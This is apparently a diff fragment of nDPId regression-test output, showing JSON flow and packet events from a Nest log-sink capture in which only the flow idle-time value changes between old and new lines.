00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536718202959,"pkt":"AJD7JidrGLQwJjRACABFAABEMJoAAP8RJazAqPIPwKjyAc5xADUAMPGqwpsBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} 
00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1536718202959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536718202959,"pkt":"GLQwJjRAAJD7JidrCABFAABUb5VAAEARZaHAqPIBwKjyDwA1znEAQGW0wpuBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":836,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1536718206638,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718206638,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93jm8XvxCTEl4mASaQNQ+QAAAgQFtA=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1536718206640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718206640,"pkt":"AJD7JidrGLQwJjRACABFAAAoMLgAAP8GYcTAqPIPI65S7fd4K1cJMSXi5vF78lAQEgC\/uQAAAAAAAAAA"} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718206572,"flow_last_seen":1536718208745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718208745,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718209313,"flow_last_seen":1536718209313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718209313,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":858,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1536718209313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718209313,"pkt":"AJD7JidrGLQwJjRACABFAAAsMMIAAP8GGdvAqPIPI7yauvd5K1cJPKL3AAAAAGACEgBHJwAAAgQEgAAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1536718209383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718209383,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93le92HNCTyi+GASbvAoVQAAAgQFjA=="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1536718209385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718209385,"pkt":"AJD7JidrGLQwJjRACABFAAAoMMQAAP8GGd3AqPIPI7yauvd5K1cJPKL4XvdhzlAQEgCc2gAAAAAAAAAA"} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718209313,"flow_last_seen":1536718211481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1262,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718211481,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1536718052990,"flow_last_seen":1536718206634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536718202984,"flow_last_seen":1536718206546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":9459,"flow_avg_l4_payload_len":193,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":892,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1536718209313,"flow_last_seen":1536718211968,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":2258,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1536718332214,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63353,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":896,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718392405,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":900,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":900,"packets-processed":713,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1536718512170} 00565{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":950,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":950,"packets-processed":743,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":117,"global_ts_msec":1536719113902} 
00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":773,"total-skipped-flows":0,"total-l4-data-len":75380,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":17,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":118,"global_ts_msec":1536719715232} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1536718206572,"flow_last_seen":1536719715232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":676,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536719715232,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
